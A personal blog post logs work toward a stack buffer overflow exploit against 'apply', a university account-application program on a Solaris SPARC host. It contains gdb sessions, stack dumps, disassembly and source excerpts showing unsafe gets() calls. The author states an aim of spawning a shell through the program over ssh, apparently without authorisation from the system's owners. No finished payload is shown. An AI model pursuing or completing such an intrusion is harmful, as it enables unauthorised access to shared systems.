Pearl — Hacking Apply Pt III
First was to obtain the source code from blade72,
/sources/apply-1.2
This wasn’t advertised, I happened to be digging around the filesystem one day and accidently stumbled upon it :)
fortunately it’s pre-compiled.. I move the sources to my own box..
run it..
need to make /home/apply user directory – need to create the whole apply user really.. – and /home/apply/setup file.
-bash-4.3$ cat /home/apply/setup cs320-1|Applied Discrete Math|Prof. E. Polker|||||
^ ^ ^ The above wasn’t given to me, I had to figure out the format from this incomplete snippet:
load_params(Param_set) struct param_set Param_set[]; { int fd, i, j, n, linecnt; char *a, *b, *bufend, *recend; struct param_set *p; struct group *g; DBUG(HELLO,"load_params()\n",NULL); if ( (fd=open(SETUP,O_RDONLY)) < 0 ) fatal("Cannot open SETUP file.\n"); /* * For now read the whole file. If it becomes worth it, * take the trouble to read lines and discard comments. */ bufend = (buf - 1 + sizeof(buf)); n=1; /* kick start the loop -- ugly! */ for ( b=buf ; n > 0 && b < (bufend-BUFSIZ) ; b += n ) if ( (n=read(fd,b,BUFSIZ)) < 0 ) fatal("Read error while getting SETUP file.\n"); if ( b >= bufend ) { fatal("Out of buffer space for parameter sets.\n"); } else bufend = b; /* remember where end of buffered data is */ close(fd); *bufend = EOS; /* * Now chug along the buffer, initializing the Param_set array. */ for ( linecnt = 1, i = 0, b = buf, p = Param_set; ( i < NPSETS && b < bufend ); linecnt++, b = recend + 1 ) { DBUG(8,"Parsing SETUP line %d:\n",linecnt); if ((recend=index(b,EOL)) == 0) /* somebody emacs'd SETUP and missed the last linefeed */ recend = bufend; *recend = EOS; if ( *b != COMMENT ) { setptr(&p->gr_name, &a,&b,linecnt); setptr(&p->course_name, &a,&b,linecnt); setptr(&p->instructor, &a,&b,linecnt); setptr(&p->notify_apply, &a,&b,linecnt); setptr(&p->notify_reply, &a,&b,linecnt); setptr(&p->course_time, &a,&b,linecnt); setptr(&p->acct_type, &a,&b,linecnt); DBUG(IGNORE,"group name: %s\n",p->gr_name); #ifdef REPLY /* apply doesn't care about homes or group id's */ setgrent(); /* open/rewind group file */ if ((g=getgrnam(p->gr_name)) == NULL) { printf("Group %s: ",p->gr_name); /* tacky */ fatal("Cannot get gid from /etc/group.\n"); } p->gr_gid = g->gr_gid; DBUG(8,"gid found: %d\n",p->gr_gid); for (j=0; b<recend && j<MAXHOMES; j++,b=a+1) { p->homes[j] = b; a = index(b,SFS); if (a != 0) *a = EOS; else a = recend; DBUG(8,"\t\tp->homes[%d]==",j); DBUG(8,"%s\n",b); } p->homes[j] = NULL; /* flag end of valid entries */ #endif /* REPLY */ i++; p++; } } #ifdef REPLY endgrent(); /* close group file */ #endif /* REPLY */ if ( b < bufend && i >= NPSETS ) fatal("Out of data structures for parameter sets!"); DBUG(4,"load_params returning %d\n",i); return(i); /* Number of sets loaded into array */ } setptr(p,a,b,linecnt) char **p, **a, **b; { *p = *b; if ((*a = index(*b,PFS)) != 0) { **a = EOS; *b = *a+1; } else { printf("Broken record in SETUP file: line %d.\n", linecnt); fatal("Cannot continue."); } }
I learned a few IMPORTANT things.
I can send a buffer overflow through a raw PTY through SSH :) Did IT!
compilin an app with/without debugging symbols does not affect the stack address.
I also now know it’s very important to attack the original binary, if at all possible, because such things
such as stack frames being restored may differ between your own compilation of the program vs. the original.
Found my buffer overflow attack vector: register as new user, derp passwd, ugrad sign up, register 1 group course, q, then to “is this ok?” say “n”, and then put in a buffer large that starts with ‘q’ – q is for the first char to be processed as a direct return. Then you must agree that it looks “OK” with ‘y.’ Hopefully that caller stack is not too borked in that it can get to the return. If we get that far.. Well sweet sauce
It’s very important to ensure the nested target functions both ret/restore at the end of their functions. This ensures the stack is getting rotated and return values are popping.
-bash-4.3$ cd latest/apply-1.2-stock/ -bash-4.3$ ls Makefile apply-externs.o make.history reply-subr.o OLD apply-subr.o make.out reply.c RCS apply.c mkaccounts reply.o README apply.o passwd.c reply.real add_groups externs.c ply.h script add_groups.c how_to.tex.f90 reply subr.c apply invoke2 reply-externs.o -bash-4.3$ $PWD/invoke2 -d apply GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (no debugging symbols found) (gdb) break Review Breakpoint 1 at 0x12434 (gdb) r Starting program: /home/bazz/latest/apply-1.2-stock/apply (no debugging symbols found) warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Welcome to ---------, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)? n Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? jdoe Please enter your full name. Be sure to use upper and lower case, as in John Q. Public. It is very important to get this right, as this is how your name will appear on lab access lists and in mail messages you send. Full name? jdoe Enter a password consisting of printable characters, spaces or tabs. It can be as long as you like, but only the first 8 characters matter. Do not use your login or real name in any form -- too easy to guess. **-*-* Do not give your password to anybody under any circumstances! *-*-** As you type in your password, characters will not be echoed to your screen. This is to protect your account. To be sure you did not mis-type anything, you will be asked to enter your password a second time. Password: Again: [Note : the password has to be entered via a PTY Master ] Please describe yourself by choosing one of these menu items: 1) ugrad Undergraduate student enrolled in one or more CS courses 2) grad Graduate student enrolled in one or more CS courses 3) alumni Alumnus of Math and CS 4) faculty Member of the Math and CS faculty 5) staff Member of the Math and CS professional or classified staff 6) crtsy Courtesy account applicant that has spoken to the Sys Admin 7) None of the above. (This will abandon the application!) Menu item number [1-7] or command [tpx?] : 1 Now you will be shown a list of the available groups. Classes are set up as UNIX groups, and there are groups for other kinds of accounts, too. Please enter the number(s) of the group(s) or class(es) that you belong in. Enter them one at a time. When there are no more to enter, type q to stop. Remember that if you make an error, you will have a chance to do this again. Sometimes the list is more than a screenful, so we use the `more` command to present a screenful at a time. If you see the '[More]' prompt, then press RETURN for the next line, SPACE for the next screen. You may want to write down the menu item numbers for your course(s). Press RETURN to continue. These are the categories of accounts: 1) cs320-1 Applied Discrete Math Prof. E. Bolker Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help. Please enter a group number [1-1] or command [cptqx?] : 1 Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help. Please enter a group number [1-1] or command [cptqx?] : q Breakpoint 1, 0x00012434 in Review () (gdb) x/5i $pc 0x12434 <Review+8>: sethi %hi(0x29000), %g1 0x12438 <Review+12>: or %g1, 0x1a0, %o5 ! 0x291a0 <_iob+16> 0x1243c <Review+16>: sethi %hi(0x29000), %g1 0x12440 <Review+20>: or %g1, 0x1a0, %g1 ! 0x291a0 <_iob+16> 0x12444 <Review+24>: ld [ %g1 ], %g1 (gdb) x/5i $pc-8 0x1242c <Review>: save %sp, -112, %sp 0x12430 <Review+4>: st %i0, [ %fp + 0x44 ] 0x12434 <Review+8>: sethi %hi(0x29000), %g1 0x12438 <Review+12>: or %g1, 0x1a0, %o5 ! 0x291a0 <_iob+16> 0x1243c <Review+16>: sethi %hi(0x29000), %g1 (gdb) x/96x $sp 0xffbefd58: 0xffbef9a8 0x00028d90 0x00000000 0x00000000 0xffbefd68: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefd78: 0x00027ccc 0x00028d91 0x0002919e 0x00000001 0xffbefd88: 0xff33c008 0x00000003 0xffbefdc8 0x00011434 0xffbefd98: 0x00000000 0x00027ccc 0x00027cc0 0x00000031 0xffbefda8: 0x00000032 0x00000000 0x00000001 0x00000000 0xffbefdb8: 0xff33f014 0xff320208 0xffbefdc8 0x0001135c 0xffbefdc8: 0xff33e5f0 0x00000000 0x00000000 0x00000000 0xffbefdd8: 0x00000000 0x00000000 0x00000000 0xff3de7a8 0xffbefde8: 0x00000001 0xffbefebc 0xffbefec4 0x0002a6e4 0xffbefdf8: 0x00000000 0x00000000 0xffbefe58 0x00010fec 0xffbefe08: 0x00000000 0x00027ccc 0xffbefe78 0x00000000 0xffbefe18: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe28: 0x00000003 0x00000000 0x00000000 0x00000000 0xffbefe38: 0x00000000 0xffffffff 0x00000000 0x00000000 0xffbefe48: 0x00000000 0x00000000 0xffbefe58 0x00010fac 0xffbefe58: 0x00000001 0xffbefebc 0x00000000 0x00000000 0xffbefe68: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe78: 0x00000000 0x00000000 0x00000000 0x00000000 ---Type <return> to continue, or q <return> to quit--- 0xffbefe88: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe98: 0x00000000 0x00000001 0xffbefebc 0x00000000 0xffbefea8: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefeb8: 0x00000001 0xffbeff50 0x00000000 0xffbeff78 0xffbefec8: 0xffbeff83 0xffbeff8c 0xffbeffb2 0x00000000 (gdb) b Edit Breakpoint 2 at 0x12564 (gdb) c Continuing. Name: jdoe Login: jdoe Account type: ugrad Group(s): cs320-1 Is this okay (y or n)? n Breakpoint 2, 0x00012564 in Edit () (gdb) x/96x $sp 0xffbefce0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefcf0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefd00: 0x00027ccc 0x000291a0 0x0000000a 0x00000002 0xffbefd10: 0xff33c008 0x000291a0 0xffbefd58 0x000124cc 0xffbefd20: 0xff33c008 0x000291a0 0x00025cc0 0xff343a54 0xffbefd30: 0x00000000 0x000294e0 0x00000000 0x000291a0 0xffbefd40: 0x00000001 0x00000001 0xff33c008 0x000291a0 0xffbefd50: 0xffbefd58 0x00012468 0xffbef9a8 0x00028d90 0xffbefd60: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefd70: 0x00000000 0x00000000 0x00027ccc 0x00028d91 0xffbefd80: 0x0002919e 0x00000001 0xff33c008 0x00000003 0xffbefd90: 0xffbefdc8 0x00011434 0x00000000 0x00027ccc 0xffbefda0: 0x00027cc0 0x00000031 0x00000032 0x00000000 0xffbefdb0: 0x00000001 0x00000000 0xff33f014 0xff320208 0xffbefdc0: 0xffbefdc8 0x0001135c 0xff33e5f0 0x00000000 0xffbefdd0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefde0: 0x00000000 0xff3de7a8 0x00000001 0xffbefebc 0xffbefdf0: 0xffbefec4 0x0002a6e4 0x00000000 0x00000000 0xffbefe00: 0xffbefe58 0x00010fec 0x00000000 0x00027ccc ---Type <return> to continue, or q <return> to quit--- 0xffbefe10: 0xffbefe78 0x00000000 0x00000000 0x00000000 0xffbefe20: 0x00000000 0x00000000 0x00000003 0x00000000 0xffbefe30: 0x00000000 0x00000000 0x00000000 0xffffffff 0xffbefe40: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe50: 0xffbefe58 0x00010fac 0x00000001 0xffbefebc (gdb)
-bash-4.3$ pwd /home/bazz/latest/apply-1.2-stock -bash-4.3$ -bash-4.3$ ./apply& Welcome to --------, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. [1] 1092 [1]+ Stopped ./apply -bash-4.3$ pmap 1092 1092: ./apply 00010000 24K read/exec apply 00024000 8K read/write/exec apply 00026000 24K read/write/exec [ heap ] FF180000 576K read/exec /usr/lib/libnsl.so.1 FF210000 40K read/write/exec /usr/lib/libnsl.so.1 FF21A000 24K read/write/exec /usr/lib/libnsl.so.1 FF250000 16K read/exec /usr/platform/sun4u/lib/libc_psr.so.1 FF260000 16K read/exec /usr/lib/libmp.so.2 FF274000 8K read/write/exec /usr/lib/libmp.so.2 FF280000 688K read/exec /usr/lib/libc.so.1 FF33C000 32K read/write/exec /usr/lib/libc.so.1 FF350000 8K read/write/exec [ anon ] FF360000 8K read/write/exec /usr/lib/libdl.so.1 FF370000 40K read/exec /usr/lib/libsocket.so.1 FF38A000 8K read/write/exec /usr/lib/libsocket.so.1 FF3A0000 184K read/exec /usr/lib/ld.so.1 FF3DE000 8K read/write/exec /usr/lib/ld.so.1 FF3E0000 8K read/write/exec /usr/lib/ld.so.1 FFBEE000 8K read/write/exec [ stack ] total 1728K -bash-4.3$
this says that the stack in apply is also 8K like from test vuln program, and also starts at the same address.
TO BE CONTINUED —
from here on out I will keep it a secret and just let it go….. NAHT
I am going to exploit an overflow in the above targeted stack frames.
After I create a specific targeted exploit, I will then learn how to do NOP slide with automatic slicing offsets.
The current end goal is to be able to ssh into the target application, manually navigate to the vulnerable section, CTRL-D to trigger the buffer overflow. If a shell is spawned, disable all signal catchers by throwing another seperate signal. Then haxxor away. Tell teh feds.
But, if the shell doesn’t spawn, an automatic slice counter should increment when the buffer signal is sent. I will then reconnect and perform manual duties — Send the buffer. This shouldn’t have to be done more than a max of 9 or 10 times or less, given that the stack is 8192 bytes, the buffer is 1024 before even starting to be overflowed. Plenty of room for a great NOP slide.. I will have to investigate the premium buffer. I am leaning towards putting the payload before the return address to make use of the guaranteed 1024 bytes + the few after 1024 that come before the %fp. Will have to calculate that.. Alright PEACE!
BACK AGAIN
-bash-4.3$ ./pty_apply Opening master device Doing Grantpt() Unlocking pt getting stdin termios getting window settings ---Getting slave name ---Opening slave Forking in CHILD: ---Setsid() ---Pushing ptem module to slave ---Pushing ldterm module to slave ---setting term settings ---setting window settings In Parent: This shell is interactive bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest]
In the middle of the blind chaos I have to do
stty echo
bazz@life[pts/8][~/latest] cd ~/latest/apply-1.2-stock/ bazz@life[pts/8][~/latest/apply-1.2-stock] $PWD/invoke2 -d apply GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (no debugging symbols found) (gdb) break Review Breakpoint 1 at 0x12434 (gdb) break Edit Breakpoint 2 at 0x12564 (gdb) r Starting program: /home/bazz/latest/apply-1.2-stock/apply (no debugging symbols found) warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Welcome to --, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)?
at this point it’s important to note that I have to use CTRL-J to make the newline, and hence continue..
It turns out that the attack vector illustrated above is not going to work. The buffer passed into gets() is a global buffer, I need something local to be easy. So I search around and I find this:
...
Never mind, it was a #ifdef code block that doesn’t actually count :(
gets(buf) from Login() looks good
Login(datap) struct info *datap; { struct passwd *pw; char buf[1024], *ch, c; int okay, n; DBUG(HELLO,"** Login()\n",NULL); if (action == MODIFY) { printf("You cannot change the login name of an existing account!\n"); printf("If you MUST change your login see the system administrator.\n"); return(0); } for ( okay=FALSE; okay==FALSE; ) { blurb(Login_inst); printf("Login name? "); gets(buf);
>_< nevermind [code lang="c"] if ((n=strlen(buf)) < 1) continue; else { if (n > MAXLOGLEN) { printf("Your login name must not be longer than %d characters.\n", MAXLOGLEN); printf("Please try again.\n"); contin [/code] How about the YES-OR-NO prompt?!?!
/* Ask a yes-or-no question. */ askyorn(prompt) char *prompt; { char c[SBUF]; int n; for (n=0; n < 10; ++n){ printf("%s (y or n)? ", prompt); gets(c); switch (c[0]){ case 'y': case 'Y': return(1); case 'n': case 'N': return(0); default : printf("Please answer y or n: "); continue; } } return(0); /* return negative if they can't get it right */ }
I THINK WE HAVE A WINNER
My goal is to be able to return into the overflowed buffer before the apply program submits any recorded data. Then someone could figure something out a lot easier. I just found my way in.
WELL I RAN into a new problem. The PTY write of a large buffer cuts out around 1300-1400. I wonder how can I get the full 6000 in there?? :( the answer is in fact that ‘stty echo’ should not be invoked. it has to do with it somehow…
AND THIS is the life of someone hacking from a raw terminal :
bazz@life[pts/15][~/latest/apply-1.2-stock] Welcome to ------, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)? Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? Please enter your full name. Be sure to use upper and lower case, as in John Q. Public. It is very important to get this right, as this is how your name will appear on lab access lists and in mail messages you send. Full name? Enter a password consisting of printable characters, spaces or tabs. It can be as long as you like, but only the first 8 characters matter. Do not use your login or real name in any form -- too easy to guess. **-*-* Do not give your password to anybody under any circumstances! *-*-** As you type in your password, characters will not be echoed to your screen. This is to protect your account. To be sure you did not mis-type anything, you will be asked to enter your password a second time. Password: Again: Please describe yourself by choosing one of these menu items: 1) ugrad Undergraduate student enrolled in one or more CS courses 2) grad Graduate student enrolled in one or more CS courses 3) alumni Alumnus of Math and CS 4) faculty Member of the Math and CS faculty 5) staff Member of the Math and CS professional or classified staff 6) crtsy Courtesy account applicant that has spoken to the Sys Admin 7) None of the above. (This will abandon the application!) Menu item number [1-7] or command [tpx?] : You must select one of the choices. Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] : Bus Error bazz@life[pts/15][~/latest/apply-1.2-stock] bazz@life[pts/15][~/latest/apply-1.2-stock] GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (no debugging symbols found) (gdb) Dump of assembler code for function Acct: 0x000114c0 <Acct+0>: save %sp, -136, %sp 0x000114c4 <Acct+4>: st %i0, [ %fp + 0x44 ] 0x000114c8 <Acct+8>: sethi %hi(0x25800), %g1 0x000114cc <Acct+12>: or %g1, 0x260, %o0 ! 0x25a60 <Acct_inst> 0x000114d0 <Acct+16>: call 0x13274 <blurb> 0x000114d4 <Acct+20>: nop 0x000114d8 <Acct+24>: ld [ %fp + 0x44 ], %g1 0x000114dc <Acct+28>: add %g1, 0x804, %g1 0x000114e0 <Acct+32>: mov %g1, %o0 0x000114e4 <Acct+36>: sethi %hi(0x13c00), %g1 0x000114e8 <Acct+40>: or %g1, 0x148, %o1 ! 0x13d48 0x000114ec <Acct+44>: call 0x25820 <strcpy@plt> 0x000114f0 <Acct+48>: nop ---Type <return> to continue, or q <return> to quit---0x000114f4 <Acct+52> sethi %hi(0x13c00), %g1 0x000114f8 <Acct+56>: or %g1, 0x150, %o0 ! 0x13d50 0x000114fc <Acct+60>: mov 7, %o1 0x00011500 <Acct+64>: call 0x257d8 <printf@plt> 0x00011504 <Acct+68>: nop 0x00011508 <Acct+72>: sethi %hi(0x28c00), %g1 0x0001150c <Acct+76>: or %g1, 0x190, %o0 ! 0x28d90 <ibuf> 0x00011510 <Acct+80>: call 0x25808 <gets@plt> 0x00011514 <Acct+84>: nop 0x00011518 <Acct+88>: mov %o0, %g1 0x0001151c <Acct+92>: cmp %g1, 0 0x00011520 <Acct+96>: bne 0x1154c <Acct+140> 0x00011524 <Acct+100>: nop 0x00011528 <Acct+104>: sethi %hi(0x28c00), %g1 ---Type <return> to continue, or q <return> to quit---0x0001152c <Acct+108>: or %g1, 0x190, %o5 ! 0x28d90 <ibuf> 0x00011530 <Acct+112>: mov 0x78, %g1 0x00011534 <Acct+116>: stb %g1, [ %o5 ] 0x00011538 <Acct+120>: sethi %hi(0x28c00), %g1 0x0001153c <Acct+124>: or %g1, 0x191, %g1 ! 0x28d91 <ibuf+1> 0x00011540 <Acct+128>: clrb [ %g1 ] 0x00011544 <Acct+132>: b 0x11574 <Acct+180> 0x00011548 <Acct+136>: nop 0x0001154c <Acct+140>: sethi %hi(0x28c00), %g1 0x00011550 <Acct+144>: or %g1, 0x190, %g1 ! 0x28d90 <ibuf> 0x00011554 <Acct+148>: ldub [ %g1 ], %g1 0x00011558 <Acct+152>: sll %g1, 0x18, %g1 0x0001155c <Acct+156>: sra %g1, 0x18, %g1 0x00011560 <Acct+160>: cmp %g1, 0 ---Type <return> to continue, or q <return> to quit---0x00011564 <Acct+164>: bne 0x11574 <Acct+180> 0x00011568 <Acct+168>: nop 0x0001156c <Acct+172>: b 0x114f4 <Acct+52> 0x00011570 <Acct+176>: nop 0x00011574 <Acct+180>: sethi %hi(0x28c00), %g1 0x00011578 <Acct+184>: or %g1, 0x190, %g1 ! 0x28d90 <ibuf> 0x0001157c <Acct+188>: ldub [ %g1 ], %g1 0x00011580 <Acct+192>: sll %g1, 0x18, %g1 0x00011584 <Acct+196>: sra %g1, 0x18, %g1 0x00011588 <Acct+200>: st %g1, [ %fp + -36 ] 0x0001158c <Acct+204>: ld [ %fp + -36 ], %g1 0x00011590 <Acct+208>: cmp %g1, 0x74 0x00011594 <Acct+212>: be 0x115ec <Acct+300> 0x00011598 <Acct+216>: nop ---Type <return> to continue, or q <return> to quit---0x0001159c <Acct+220>: ld [ %fp + -36 ], %g1 0x000115a0 <Acct+224>: cmp %g1, 0x74 0x000115a4 <Acct+228>: bg 0x115d4 <Acct+276> 0x000115a8 <Acct+232>: nop 0x000115ac <Acct+236>: ld [ %fp + -36 ], %g1 0x000115b0 <Acct+240>: cmp %g1, 0x3f 0x000115b4 <Acct+244>: be 0x11824 <Acct+868> 0x000115b8 <Acct+248>: nop 0x000115bc <Acct+252>: ld [ %fp + -36 ], %g1 0x000115c0 <Acct+256>: cmp %g1, 0x70 0x000115c4 <Acct+260>: be 0x11600 <Acct+320> 0x000115c8 <Acct+264>: nop 0x000115cc <Acct+268>: b 0x11658 <Acct+408> 0x000115d0 <Acct+272>: nop ---Type <return> to continue, or q <return> to quit---0x000115d4 <Acct+276>: ld [ %fp + -36 ], %g1 0x000115d8 <Acct+280>: cmp %g1, 0x78 0x000115dc <Acct+284>: be 0x11618 <Acct+344> 0x000115e0 <Acct+288>: nop 0x000115e4 <Acct+292>: b 0x11658 <Acct+408> 0x000115e8 <Acct+296>: nop 0x000115ec <Acct+300>: ld [ %fp + 0x44 ], %o0 0x000115f0 <Acct+304>: call 0x132d0 <show_info> 0x000115f4 <Acct+308>: nop 0x000115f8 <Acct+312>: b 0x114f4 <Acct+52> 0x000115fc <Acct+316>: nop 0x00011600 <Acct+320>: sethi %hi(0x25800), %g1 0x00011604 <Acct+324>: or %g1, 0x260, %o0 ! 0x25a60 <Acct_inst> 0x00011608 <Acct+328>: call 0x13274 <blurb> ---Type <return> to continue, or q <return> to quit---0x0001160c <Acct+332>: nop 0x00011610 <Acct+336>: b 0x114f4 <Acct+52> 0x00011614 <Acct+340>: nop 0x00011618 <Acct+344>: sethi %hi(0x13c00), %g1 0x0001161c <Acct+348>: or %g1, 0x180, %o0 ! 0x13d80 0x00011620 <Acct+352>: call 0x257d8 <printf@plt> 0x00011624 <Acct+356>: nop 0x00011628 <Acct+360>: sethi %hi(0x13c00), %g1 0x0001162c <Acct+364>: or %g1, 0x1a8, %o0 ! 0x13da8 0x00011630 <Acct+368>: call 0x12a30 <askyorn> 0x00011634 <Acct+372>: nop 0x00011638 <Acct+376>: mov %o0, %g1 0x0001163c <Acct+380>: cmp %g1, 0 0x00011640 <Acct+384>: be 0x114f4 <Acct+52> ---Type <return> to continue, or q <return> to quit---0x00011644 <Acct+388>: nop 0x00011648 <Acct+392>: call 0x1320c <quit> 0x0001164c <Acct+396>: nop 0x00011650 <Acct+400>: b 0x114f4 <Acct+52> 0x00011654 <Acct+404>: nop 0x00011658 <Acct+408>: sethi %hi(0x28c00), %g1 0x0001165c <Acct+412>: or %g1, 0x190, %g1 ! 0x28d90 <ibuf> 0x00011660 <Acct+416>: ldub [ %g1 ], %g1 0x00011664 <Acct+420>: sll %g1, 0x18, %g1 0x00011668 <Acct+424>: sra %g1, 0x18, %o5 0x0001166c <Acct+428>: sethi %hi(0x29000), %g1 0x00011670 <Acct+432>: or %g1, 0x2d1, %g1 ! 0x292d1 <_ctype+1> 0x00011674 <Acct+436>: ldub [ %o5 + %g1 ], %g1 0x00011678 <Acct+440>: and %g1, 0xff, %g1 ---Type <return> to continue, or q <return> to quit---0x0001167c <Acct+444>: srl %g1, 2, %g1 0x00011680 <Acct+448>: and %g1, 1, %g1 0x00011684 <Acct+452>: cmp %g1, 0 0x00011688 <Acct+456>: be 0x11814 <Acct+852> 0x0001168c <Acct+460>: nop 0x00011690 <Acct+464>: sethi %hi(0x28c00), %g1 0x00011694 <Acct+468>: or %g1, 0x190, %o0 ! 0x28d90 <ibuf> 0x00011698 <Acct+472>: call 0x2582c <atoi@plt> 0x0001169c <Acct+476>: nop 0x000116a0 <Acct+480>: mov %o0, %g1 0x000116a4 <Acct+484>: st %g1, [ %fp + -20 ] 0x000116a8 <Acct+488>: ld [ %fp + -20 ], %g1 0x000116ac <Acct+492>: cmp %g1, 0 0x000116b0 <Acct+496>: ble 0x117fc <Acct+828> ---Type <return> to continue, or q <return> to quit---0x000116b4 <Acct+500>: nop 0x000116b8 <Acct+504>: ld [ %fp + -20 ], %g1 0x000116bc <Acct+508>: cmp %g1, 7 0x000116c0 <Acct+512>: bg 0x117fc <Acct+828> 0x000116c4 <Acct+516>: nop 0x000116c8 <Acct+520>: ld [ %fp + -20 ], %g1 0x000116cc <Acct+524>: cmp %g1, 7 0x000116d0 <Acct+528>: bne 0x11708 <Acct+584> 0x000116d4 <Acct+532>: nop 0x000116d8 <Acct+536>: sethi %hi(0x13c00), %g1 0x000116dc <Acct+540>: or %g1, 0x1d8, %o0 ! 0x13dd8 0x000116e0 <Acct+544>: call 0x257d8 <printf@plt> 0x000116e4 <Acct+548>: nop 0x000116e8 <Acct+552>: sethi %hi(0x13c00), %g1 ---Type <return> to continue, or q <return> to quit---0x000116ec <Acct+556>: or %g1, 0x208, %o0 ! 0x13e08 0x000116f0 <Acct+560>: call 0x257d8 <printf@plt> 0x000116f4 <Acct+564>: nop 0x000116f8 <Acct+568>: call 0x1320c <quit> 0x000116fc <Acct+572>: nop 0x00011700 <Acct+576>: b 0x114f4 <Acct+52> 0x00011704 <Acct+580>: nop 0x00011708 <Acct+584>: sethi %hi(0x25800), %g1 0x0001170c <Acct+588>: or %g1, 0x260, %o5 ! 0x25a60 <Acct_inst> 0x00011710 <Acct+592>: ld [ %fp + -20 ], %g1 0x00011714 <Acct+596>: sll %g1, 2, %g1 0x00011718 <Acct+600>: add %g1, %o5, %g1 0x0001171c <Acct+604>: ld [ %g1 + 0xc ], %g1 0x00011720 <Acct+608>: st %g1, [ %fp + -24 ] ---Type <return> to continue, or q <return> to quit---0x00011724 <Acct+612>: ld [ %fp + -24 ], %g1 0x00011728 <Acct+616>: add %g1, 3, %g1 0x0001172c <Acct+620>: st %g1, [ %fp + -24 ] 0x00011730 <Acct+624>: ld [ %fp + 0x44 ], %g1 0x00011734 <Acct+628>: add %g1, 0x804, %g1 0x00011738 <Acct+632>: st %g1, [ %fp + -28 ] 0x0001173c <Acct+636>: ld [ %fp + -24 ], %g1 0x00011740 <Acct+640>: ldub [ %g1 ], %g1 0x00011744 <Acct+644>: sll %g1, 0x18, %g1 0x00011748 <Acct+648>: sra %g1, 0x18, %g1 0x0001174c <Acct+652>: cmp %g1, 0 0x00011750 <Acct+656>: be 0x117c0 <Acct+768> 0x00011754 <Acct+660>: nop 0x00011758 <Acct+664>: ld [ %fp + -24 ], %g1 ---Type <return> to continue, or q <return> to quit---0x0001175c <Acct+668>: ldub [ %g1 ], %g1 0x00011760 <Acct+672>: sll %g1, 0x18, %g1 0x00011764 <Acct+676>: sra %g1, 0x18, %o5 0x00011768 <Acct+680>: sethi %hi(0x29000), %g1 0x0001176c <Acct+684>: or %g1, 0x2d1, %g1 ! 0x292d1 <_ctype+1> 0x00011770 <Acct+688>: ldub [ %o5 + %g1 ], %g1 0x00011774 <Acct+692>: and %g1, 0xff, %g1 0x00011778 <Acct+696>: srl %g1, 3, %g1 0x0001177c <Acct+700>: and %g1, 1, %g1 0x00011780 <Acct+704>: cmp %g1, 0 0x00011784 <Acct+708>: bne 0x117c0 